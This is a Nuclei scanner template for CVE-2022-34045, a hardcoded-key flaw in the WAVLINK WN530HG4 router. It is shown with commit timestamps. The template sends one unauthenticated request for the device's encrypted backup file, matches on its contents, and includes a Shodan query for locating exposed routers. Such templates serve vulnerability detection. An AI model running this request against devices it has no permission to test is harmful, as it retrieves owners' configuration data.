nuclei-templates/http/cves/2022/CVE-2022-34045.yaml

47 lines
1.3 KiB
YAML
Raw Normal View History

2022-08-14 11:40:20 +00:00
id: CVE-2022-34045
info:
name: WAVLINK WN530HG4 - Improper Access Control
2022-08-14 11:40:20 +00:00
author: arafatansari
2022-08-14 12:36:14 +00:00
severity: critical
2022-08-14 11:40:20 +00:00
description: |
WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. It contains a hardcoded encryption/decryption key for its configuration files at /etc_ro/lighttpd/www/cgi-bin/ExportAllSettings.sh. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
2022-08-14 11:40:20 +00:00
reference:
2022-08-14 12:36:14 +00:00
- https://drive.google.com/file/d/1s5uZGC_iSzfCJt9BJ8h-P24vmsrmttrf/view?usp=sharing
- https://nvd.nist.gov/vuln/detail/CVE-2022-34045
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2022-08-14 12:36:14 +00:00
cve-id: CVE-2022-34045
cwe-id: CWE-798
epss-score: 0.00785
2022-08-14 11:40:20 +00:00
metadata:
max-request: 1
2022-08-14 11:40:20 +00:00
shodan-query: http.html:"WN530HG4"
verified: "true"
2022-08-14 12:36:14 +00:00
tags: cve,cve2022,wavlink,exposure
2022-08-14 11:40:20 +00:00
http:
2022-08-14 11:40:20 +00:00
- raw:
- |
2022-08-23 05:03:57 +00:00
GET /backupsettings.dat HTTP/1.1
2022-08-14 11:40:20 +00:00
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
2022-08-14 12:36:14 +00:00
part: body
2022-08-14 11:40:20 +00:00
words:
2022-08-23 05:03:57 +00:00
- 'Salted__'
2022-08-14 12:36:14 +00:00
- type: word
part: header
words:
2022-08-23 05:03:57 +00:00
- application/octet-stream
2022-08-14 12:36:14 +00:00
- type: status
status:
- 200
# Enhanced by md on 2023/02/03